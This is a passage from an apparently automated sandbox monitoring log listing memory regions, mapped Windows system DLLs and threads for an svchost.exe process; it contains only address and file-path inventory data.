"private_0x0000000000bf0000" filename = "" Region: id = 5074 start_va = 0xc70000 end_va = 0xf3efff entry_point = 0xc70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5075 start_va = 0xf70000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 5076 start_va = 0x10a0000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 5077 start_va = 0x7fef5e10000 end_va = 0x7fef5e23fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 5078 start_va = 0x7fef6370000 end_va = 0x7fef6396fff entry_point = 0x7fef6370000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5079 start_va = 0x7fef63a0000 end_va = 0x7fef6481fff entry_point = 0x7fef63a0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 5080 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5081 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5082 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 5083 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 5084 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 5085 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Thread: id = 302 os_tid = 0x210 Thread: id = 303 os_tid = 0x978 Thread: id = 304 os_tid = 0x954 Thread: id = 344 os_tid = 0xac0 Thread: id = 345 os_tid = 0xad0 Thread: id = 346 os_tid = 0xad4 Process: id = "35" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9e4d000" os_pid = "0x2cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bb5d" [0xc000000f], "LOCAL" [0x7] Region: id = 4865 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4866 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4867 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4868 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4869 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4870 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4871 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 4872 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4873 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4874 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 4875 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 4876 start_va = 0x280000 end_va = 0x33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 4877 start_va = 0x340000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4878 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 4879 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4880 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4881 start_va = 0x600000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 4882 start_va = 0x790000 end_va = 0xb82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4883 start_va = 0xb90000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 4884 start_va = 0xbd0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 4885 start_va = 0xbf0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 4886 start_va = 0xc10000 end_va = 0xc10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 4887 start_va = 0xc20000 end_va = 0xc20fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 4888 start_va = 0xc30000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 4889 start_va = 0xcb0000 end_va = 0xcb0fff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 4890 start_va = 0xcc0000 end_va = 0xcc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 4891 start_va = 0xcd0000 end_va = 0xcd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 4892 start_va = 0xce0000 end_va = 0xce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 4893 start_va = 0xcf0000 end_va = 0xcf2fff entry_point = 0xcf0000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 4894 start_va = 0xd00000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 4895 start_va = 0xd80000 end_va = 0xde1fff entry_point = 0xd80000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 4896 start_va = 0xdf0000 end_va = 0xdf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 4897 start_va = 0xe00000 end_va = 0xe00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 4898 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 4899 start_va = 0xe50000 end_va = 0xe57fff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 4900 start_va = 0xe60000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 4901 start_va = 0xee0000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 4902 start_va = 0xf90000 end_va = 0xff1fff entry_point = 0xf90000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 4903 start_va = 0x1060000 end_va = 0x132efff entry_point = 0x1060000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4904 start_va = 0x1330000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 4905 start_va = 0x1450000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 4906 start_va = 0x1530000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 4907 start_va = 0x15d0000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 4908 start_va = 0x1650000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 4909 start_va = 0x16d0000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 4910 start_va = 0x1750000 end_va = 0x17cffff entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 4911 start_va = 0x17e0000 end_va = 0x18dffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 4912 start_va = 0x1910000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 4913 start_va = 0x19a0000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 4914 start_va = 0x1a20000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 4915 start_va = 0x1aa0000 end_va = 0x1b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 4916 start_va = 0x1b30000 end_va = 0x1baffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 4917 start_va = 0x1bd0000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 4918 start_va = 0x1c60000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 4919 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 4920 start_va = 0x1d80000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 4921 start_va = 0x1f80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 4922 start_va = 0x2010000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 4923 start_va = 0x20a0000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 4924 start_va = 0x2120000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 4925 start_va = 0x25a0000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 4926 start_va = 0x2640000 end_va = 0x26bffff entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 4927 start_va = 0x2720000 end_va = 0x2b22fff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 4928 start_va = 0x2ba0000 end_va = 0x2c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 4929 start_va = 0x2c20000 end_va = 0x341ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c20000" filename = "" Region: id = 4930 start_va = 0x3440000 end_va = 0x34bffff entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 4931 start_va = 0x3560000 end_va = 0x35dffff entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 4932 start_va = 0x3610000 end_va = 0x368ffff entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 4933 start_va = 0x36b0000 end_va = 0x372ffff entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 4934 start_va = 0x37b0000 end_va = 0x38affff entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 4935 start_va = 0x3910000 end_va = 0x398ffff entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 4936 start_va = 0x3a00000 end_va = 0x3a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 4937 start_va = 0x3ab0000 end_va = 0x3b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ab0000" filename = "" Region: id = 4938 start_va = 0x3b70000 end_va = 0x3beffff entry_point = 0x0 region_type = private name = "private_0x0000000003b70000" filename = "" Region: id = 4939 start_va = 0x3c30000 end_va = 0x3caffff entry_point = 0x0 region_type = private name = "private_0x0000000003c30000" filename = "" Region: id = 4940 start_va = 0x3d20000 end_va = 0x3d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d20000" filename = "" Region: id = 4941 start_va = 0x3df0000 end_va = 0x3e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 4942 start_va = 0x3f50000 end_va = 0x3fcffff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 4943 start_va = 0x4060000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 4944 start_va = 0x4150000 end_va = 0x41cffff entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 4945 start_va = 0x4260000 end_va = 0x42dffff entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 4946 start_va = 0x42e0000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 4947 start_va = 0x75940000 end_va = 0x75942fff entry_point = 0x75940000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 4948 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4949 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4950 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4951 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4952 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4953 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4954 start_va = 0xffc20000 end_va = 0xffc2afff entry_point = 0xffc20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4955 start_va = 0xfffb0000 end_va = 0x100002fff entry_point = 0xfffb0000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 4956 start_va = 0x7fedd3a0000 end_va = 0x7fedd44dfff entry_point = 0x7fedd3a0000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 4957 start_va = 0x7fedd6e0000 end_va = 0x7fedd804fff entry_point = 0x7fedd6e0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 4958 start_va = 0x7fef2fc0000 end_va = 0x7fef2fdbfff entry_point = 0x7fef2fc0000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 4959 start_va = 0x7fef5e10000 end_va = 0x7fef5e23fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 4960 start_va = 0x7fef6370000 end_va = 0x7fef6396fff entry_point = 0x7fef6370000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4961 start_va = 0x7fef63a0000 end_va = 0x7fef6481fff entry_point = 0x7fef63a0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4962 start_va = 0x7fef7de0000 end_va = 0x7fef7dfafff entry_point = 0x7fef7de0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4963 start_va = 0x7fef8240000 end_va = 0x7fef828efff entry_point = 0x7fef8240000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 4964 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4965 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4966 start_va = 0x7fef9740000 end_va = 0x7fef977afff entry_point = 0x7fef9740000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 4967 start_va = 0x7fef9780000 end_va = 0x7fef97d0fff entry_point = 0x7fef9780000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 4968 start_va = 0x7fef97f0000 end_va = 0x7fef97f7fff entry_point = 0x7fef97f0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 4969 start_va = 0x7fef9800000 end_va = 0x7fef9809fff entry_point = 0x7fef9800000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 4970 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4971 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4972 start_va = 0x7fefbb50000 end_va = 0x7fefbb58fff entry_point = 0x7fefbb50000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 4973 start_va = 0x7fefbb60000 end_va = 0x7fefbc0bfff entry_point = 0x7fefbb60000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 4974 start_va = 0x7fefbcd0000 end_va = 0x7fefbd55fff entry_point = 0x7fefbcd0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 4975 start_va = 0x7fefbd80000 end_va = 0x7fefbd94fff entry_point = 0x7fefbd80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4976 start_va = 0x7fefbda0000 end_va = 0x7fefbdabfff entry_point = 0x7fefbda0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4977 start_va = 0x7fefbf00000 end_va = 0x7fefbf0efff entry_point = 0x7fefbf00000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4978 start_va = 0x7fefc0a0000 end_va = 0x7fefc0eafff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4979 start_va = 0x7fefc510000 end_va = 0x7fefc63bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4980 start_va = 0x7fefcb80000 end_va = 0x7fefcbabfff entry_point = 0x7fefcb80000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4981 start_va = 0x7fefcbb0000 end_va = 0x7fefcd45fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 4982 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4983 start_va = 0x7fefcd60000 end_va = 0x7fefce1afff entry_point = 0x7fefcd60000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4984 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4985 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4986 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4987 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4988 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4989 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4990 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4991 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4992 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4993 start_va = 0x7fefd6b0000 end_va = 0x7fefd71cfff entry_point = 0x7fefd6b0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4994 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4995 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4996 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4997 start_va = 0x7fefdb30000 end_va = 0x7fefdb6cfff entry_point = 0x7fefdb30000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4998 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4999 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5000 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5001 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5002 start_va = 0x7fefdd20000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd20000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 5003 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5004 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5005 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5006 start_va = 